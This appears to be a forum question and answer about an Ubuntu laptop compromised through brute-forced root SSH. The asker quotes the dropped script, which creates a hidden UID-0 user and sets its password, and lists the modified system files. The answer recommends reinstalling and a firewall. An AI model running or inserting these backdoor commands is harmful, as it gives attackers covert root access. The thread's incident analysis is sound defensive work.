How to deal with malware on my laptop?
I am fairly certain that my Ubuntu 13.10 laptop is infected with some sort of malware.
Every once in a while, I find a process /lib/sshd (owned by root) running and consuming lots of cpu. It is not the sshd server which runs /usr/sbin/sshd.
The binary has --wxrw-rwt permissions and it generates and spawns scripts in the /lib directory. A recent one is named 13959730401387633604 and it does the following
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
The gusr user was created by the malware independently, and then the chpasswd hangs while consuming 100% cpu.
So far, I've identified that the gusr user was additionally added to files in /etc/
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
It seems like the malware made copies of all these files with the "-" suffix. The full list of /etc/ files that were modified by root is available here.
In addition, the /etc/hosts file was changed to the this.
The /lib/sshd starts by adding itself to the end of /etc/init.d/rc.local file!
I've removed the user, removed the files, killed the tree of processed, changed my passwors and removed the ssh public keys.
I am aware that I am basically screwed, and I will most likely reinstall the whole system. Nevertheless, since I login to several other machines, it would be good to at least attempt to remove it, and figure out how I got it. Any suggestions on how to go about this would be appreciated.
It seems like they got in on March 25 by brute-forcing root login. I had no idea that root ssh is enabled by default in Ubuntu. I disabled it and put up denyhosts.
The login was from 59.188.247.236, somewhere in Hong Kong apparently.
I got the laptop from EmperorLinux, and they enabled root access. If you have one of those and you're running sshd beware.
Solution 1:
First, get that machine off the network now!
Second, why did you have the root account enabled? You really shouldn't enable the root account unless you have a very good reason to do so.
Thirdly, yes, the only way to be sure you're clean is to do a clean install. It's also advised that you start fresh and don't go back to a backup, as you can never be sure when it all started.
I also suggest that you set up a a firewall in your next install and deny all incoming connections:
sudo ufw default deny incoming
and then allow ssh with:
sudo ufw allow ssh
and DON'T enable the root account! Certainly make sure that root ssh login is disabled.